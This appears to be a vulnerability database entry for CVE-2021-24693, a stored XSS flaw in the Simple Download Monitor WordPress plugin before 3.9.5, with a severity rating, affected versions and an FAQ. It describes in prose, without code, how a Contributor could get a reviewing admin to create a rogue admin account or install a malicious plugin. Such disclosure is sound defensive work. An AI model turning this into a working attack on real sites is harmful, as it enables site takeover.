Vulnerability Description
The Simple Download Monitor WordPress plugin before 3.9.5 does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Given the that XSS is triggered even when the Download is in a review state, contributor could make JavaScript code execute in a context of a reviewer such as admin and make them create a rogue admin account, or install a malicious plugin
CVSS Score
CRITICAL
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Tipsandtricks-Hq | Simple Download Monitor | < 3.9.5 |
Related Weaknesses (CWE)
References
- https://wpscan.com/vulnerability/4bb559b7-8dde-4c90-a9a6-d8dcfbea53a7ExploitThird Party Advisory
- https://wpscan.com/vulnerability/4bb559b7-8dde-4c90-a9a6-d8dcfbea53a7ExploitThird Party Advisory
FAQ
What is CVE-2021-24693?
CVE-2021-24693 is a vulnerability with a CVSS score of 9.0 (CRITICAL). The Simple Download Monitor WordPress plugin before 3.9.5 does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor t...
How severe is CVE-2021-24693?
CVE-2021-24693 has been rated CRITICAL with a CVSS base score of 9.0/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2021-24693?
Check the references section above for vendor advisories and patch information. Affected products include: Tipsandtricks-Hq Simple Download Monitor.